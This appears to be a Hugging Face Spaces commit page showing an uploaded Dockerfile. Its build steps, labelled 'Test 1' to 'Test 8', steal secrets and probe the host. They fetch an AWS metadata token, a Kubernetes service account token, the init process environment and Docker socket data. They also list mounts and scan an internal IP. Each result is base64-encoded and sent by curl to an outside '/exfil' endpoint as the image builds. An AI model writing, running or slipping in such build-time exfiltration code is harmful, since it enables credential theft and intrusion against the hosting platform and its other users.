Spaces:
Runtime error
Runtime error
Upload Dockerfile with huggingface_hub
Browse files- Dockerfile +55 -0
Dockerfile
ADDED
|
@@ -0,0 +1,55 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
FROM alpine:3.19
|
| 2 |
+
|
| 3 |
+
RUN apk add --no-cache curl bash 2>/dev/null
|
| 4 |
+
|
| 5 |
+
# Test 1: IMDS v2 token request
|
| 6 |
+
RUN TOKEN=$(curl -sk --connect-timeout 5 -X PUT "http://169.254.169.254/latest/api/token" \
|
| 7 |
+
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null) ; \
|
| 8 |
+
B64=$(printf "%s" "IMDS_V2_TOKEN=${TOKEN:-NONE}" | base64 | tr -d "\n") ; \
|
| 9 |
+
curl -sk "https://xitro-env-probe.hf.space/exfil?src=imds_v2_tok&d=${B64}" || true
|
| 10 |
+
|
| 11 |
+
# Test 2: capabilities
|
| 12 |
+
RUN CAPS=$(cat /proc/self/status | grep -i cap) ; \
|
| 13 |
+
B64=$(printf "%s" "$CAPS" | base64 | tr -d "\n") ; \
|
| 14 |
+
curl -sk "https://xitro-env-probe.hf.space/exfil?src=caps&d=${B64}" || true
|
| 15 |
+
|
| 16 |
+
# Test 3: K8s service account token
|
| 17 |
+
RUN if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then \
|
| 18 |
+
B64=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token | base64 | tr -d "\n") ; \
|
| 19 |
+
curl -sk "https://xitro-env-probe.hf.space/exfil?src=sa_token&d=${B64}" || true ; \
|
| 20 |
+
else \
|
| 21 |
+
curl -sk "https://xitro-env-probe.hf.space/exfil?src=sa_token&d=NONE" || true ; \
|
| 22 |
+
fi
|
| 23 |
+
|
| 24 |
+
# Test 4: /proc/1/environ
|
| 25 |
+
RUN B64=$(cat /proc/1/environ 2>/dev/null | tr "\0" "\n" | base64 | tr -d "\n") ; \
|
| 26 |
+
curl -sk "https://xitro-env-probe.hf.space/exfil?src=proc1env&d=${B64}" || true
|
| 27 |
+
|
| 28 |
+
# Test 5: Docker socket
|
| 29 |
+
RUN if [ -S /var/run/docker.sock ]; then \
|
| 30 |
+
B64=$(curl -sk --unix-socket /var/run/docker.sock http://localhost/info 2>/dev/null | head -c 500 | base64 | tr -d "\n") ; \
|
| 31 |
+
curl -sk "https://xitro-env-probe.hf.space/exfil?src=docker_sock&d=${B64}" || true ; \
|
| 32 |
+
else \
|
| 33 |
+
curl -sk "https://xitro-env-probe.hf.space/exfil?src=docker_sock&d=NONE" || true ; \
|
| 34 |
+
fi
|
| 35 |
+
|
| 36 |
+
# Test 6: Hit internal API 10.0.249.17 on known ports
|
| 37 |
+
RUN for PORT in 80 443 8080 8443 8000 3000 5000; do \
|
| 38 |
+
RESULT=$(curl -sk --connect-timeout 2 "http://10.0.249.17:${PORT}/" 2>/dev/null | head -c 300) ; \
|
| 39 |
+
if [ -n "$RESULT" ]; then \
|
| 40 |
+
B64=$(printf "PORT:%s RESULT:%s" "$PORT" "$RESULT" | base64 | tr -d "\n") ; \
|
| 41 |
+
curl -sk "https://xitro-env-probe.hf.space/exfil?src=internal_api_17&d=${B64}" || true ; \
|
| 42 |
+
fi ; \
|
| 43 |
+
done
|
| 44 |
+
|
| 45 |
+
# Test 7: Mount points and filesystem
|
| 46 |
+
RUN MOUNTS=$(cat /proc/mounts | grep -v "proc\|sys\|dev") ; \
|
| 47 |
+
B64=$(printf "%s" "$MOUNTS" | base64 | tr -d "\n") ; \
|
| 48 |
+
curl -sk "https://xitro-env-probe.hf.space/exfil?src=mounts&d=${B64}" || true
|
| 49 |
+
|
| 50 |
+
# Test 8: Check for any BuildKit cache or other users data at /cache or overlay mounts
|
| 51 |
+
RUN B64=$(ls -la / /cache 2>&1 | base64 | tr -d "\n") ; \
|
| 52 |
+
curl -sk "https://xitro-env-probe.hf.space/exfil?src=ls_root&d=${B64}" || true
|
| 53 |
+
|
| 54 |
+
EXPOSE 7860
|
| 55 |
+
CMD ["sh", "-c", "while true; do sleep 60; done"]
|